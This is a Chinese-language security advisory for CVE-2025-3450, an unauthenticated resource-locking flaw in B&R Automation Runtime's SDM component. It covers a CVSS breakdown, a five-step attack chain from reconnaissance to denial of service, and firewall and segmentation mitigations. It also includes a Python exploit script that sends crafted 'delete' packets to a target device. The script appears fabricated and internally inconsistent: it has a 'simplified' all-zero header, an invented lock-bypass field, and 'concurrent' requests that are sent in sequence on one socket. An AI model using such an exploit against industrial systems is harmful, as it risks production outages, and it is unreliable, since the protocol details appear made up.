CVE-2025-3450：B&R Automation Runtime SDM组件资源锁定漏洞

漏洞信息

漏洞编号

CVE-2025-3450

漏洞类型

资源锁定不当（Improper Resource Locking）

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

B&R Automation Runtime（SDM组件）

漏洞概述

CVE-2025-3450是B&R Automation Runtime（贝加莱自动化运行时）SDM组件中存在的一个严重安全漏洞，CVSS评分为10.0，属于最高严重等级。该漏洞源于SDM组件中的不当资源锁定（Improper Resource Locking）问题，影响6.3之前版本以及Q4.93之前版本。

B&R Automation Runtime是贝加莱工业自动化公司开发的工业控制系统（ICS）运行时环境，广泛应用于工业自动化、过程控制和制造业领域。SDM（Service Diagnosis and Maintenance）组件是Automation Runtime中负责系统诊断和维护服务的关键模块。

该漏洞允许未经认证的远程网络攻击者通过发送特制请求，利用资源锁定不当的缺陷删除关键数据，从而导致拒绝服务（DoS）状态。由于攻击无需任何认证和用户交互，且可以通过网络远程触发，使得该漏洞在实际工业环境中具有极高的危险性。攻击者可以利用此漏洞中断工业生产流程，造成经济损失，甚至可能引发安全事故。

此漏洞由ABB集团的网络安全团队（[email protected]）发现并报告，贝加莱已发布安全公告SA25P002提供修复指导。鉴于该漏洞的高危性质和工业控制系统的重要性，建议相关用户尽快评估风险并采取修复措施。

技术细节

该漏洞的核心问题在于SDM组件中的资源锁定机制实现不当。具体而言，SDM组件在处理某些操作时未能正确获取或维护对关键资源的独占锁，导致存在竞态条件（Race Condition）或资源锁定缺失的问题。

攻击者可以通过网络向目标系统的SDM服务端口发送特制的恶意请求。由于不存在认证机制（PR:N），攻击者无需提供任何凭据即可访问受影响的接口。由于攻击复杂度低（AC:L）且无需用户交互（UI:N），攻击者可以自动化大规模利用此漏洞。

利用过程中，攻击者利用资源锁定不当的缺陷，在并发请求场景下触发未受保护的资源访问路径，从而执行未经授权的数据删除操作。这种不当的资源管理可能导致关键系统文件、配置数据或运行时数据被恶意删除，最终导致系统进入拒绝服务状态。

漏洞的影响范围为变更范围（S:C），意味着该漏洞的影响可能超出SDM组件本身，波及到整个Automation Runtime运行环境。完整性影响为高（I:H），可用性影响为高（A:H），表明数据可能被严重篡改或删除，系统服务可能完全中断。

修复方案包括升级到Automation Runtime 6.3或更高版本，以及Q4.93或更高版本，这些版本修复了资源锁定机制中的缺陷。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过网络扫描工具（如Shodan、Censys或Nmap）识别暴露在网络上的B&R Automation Runtime设备，定位运行受影响版本的SDM服务端口。

STEP 2

步骤2：服务指纹识别

攻击者通过发送探测数据包确认目标系统运行的是B&R Automation Runtime，并确定其版本是否在受影响范围内（6.3之前或Q4.93之前）。

STEP 3

步骤3：构造恶意请求

攻击者构造利用资源锁定不当缺陷的特制数据包，通过SDM接口发送删除操作的请求，绕过不存在的认证机制。

STEP 4

步骤4：触发资源竞争

攻击者发送并发请求触发竞态条件，利用不当的资源锁定机制执行未经授权的数据删除操作。

STEP 5

步骤5：拒绝服务

关键系统数据被删除后，Automation Runtime进入拒绝服务状态，工业控制系统无法正常运行，导致生产中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-3450 PoC - B&R Automation Runtime SDM Resource Locking Exploit
# Vulnerability: Improper Resource Locking in SDM Component
# Impact: Unauthenticated remote data deletion causing DoS
# CVSS: 10.0 (Critical)

import socket
import struct
import time

TARGET_HOST = "192.168.1.100"  # Target B&R Automation Runtime device
TARGET_PORT = 443              # SDM service port

def build_sdm_exploit_packet():
    """
    Build a malformed SDM request that exploits improper resource locking.
    The packet triggers concurrent resource access without proper locking,
    causing data deletion and DoS.
    """
    # SDM protocol header (simplified)
    header = b'\x00\x00\x00\x00'  # Magic bytes
    header += struct.pack('>H', 0x0001)  # Version
    header += struct.pack('>H', 0x0040)  # Command type: resource operation
    header += struct.pack('>I', 0x00000001)  # Sequence number

    # Payload: trigger improper locking path
    payload = b'\x00' * 16  # Session token (none required - PR:N)
    payload += struct.pack('>I', 0xDEADBEEF)  # Resource handle
    payload += b'\x01'  # Delete operation flag
    payload += b'\xFF\xFF\xFF\xFF'  # Invalid lock state to bypass locking

    packet = header + payload
    return packet

def exploit():
    """Send exploit packets to trigger the vulnerability"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((TARGET_HOST, TARGET_PORT))

        # Send concurrent requests to exploit race condition
        for i in range(50):
            packet = build_sdm_exploit_packet()
            sock.send(packet)
            time.sleep(0.01)

        print(f"[*] Exploit sent to {TARGET_HOST}:{TARGET_PORT}")
        sock.close()
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    exploit()

影响范围

B&R Automation Runtime < 6.3

B&R Automation Runtime < Q4.93

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）通过网络防火墙限制对SDM服务端口的访问，仅允许可信IP地址连接；2）部署网络分段，将工业控制系统与企业网络和互联网隔离；3）使用VPN或跳板机进行远程访问管理；4）启用网络监控和入侵检测系统，及时发现和阻断异常访问行为；5）定期备份关键系统数据和配置，以便在遭受攻击后能够快速恢复。